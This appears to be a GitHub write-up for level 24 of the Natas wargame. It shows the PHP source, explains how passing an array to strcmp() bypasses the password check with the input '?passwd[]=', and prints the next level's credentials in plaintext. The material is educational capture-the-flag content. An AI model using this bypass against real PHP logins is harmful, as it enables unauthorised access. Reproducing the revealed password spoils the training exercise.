Skip to content

Latest commit

 

History

History
39 lines (29 loc) · 751 Bytes

File metadata and controls

39 lines (29 loc) · 751 Bytes

Natas-24

Source:

<?php
if(array_key_exists("passwd",$_REQUEST)){

	if(!strcmp($_REQUEST["passwd"],"<censored>")){
		echo "<br>The credentials for the next level are:<br>";
		echo "<pre>Username: natas25 Password: <censored></pre>";
	}
	else{
		echo "<br>Wrong!<br>";
	}

}
// morla / 10111
?>

strcmp() returns NULL when one of its parameters is an array and !NULL returns True .

This condition for checking passwd can be bypassed by passing an array in $_REQUEST[”passwd”].

?passwd[]=

Warning
: strcmp() expects parameter 1 to be string, array given in
/var/www/natas/natas24/index.php
on line
23

The credentials for the next level are:
Username: natas25 
Password: GHF6X7YwACaYYssHVY05cFq83hRktl4c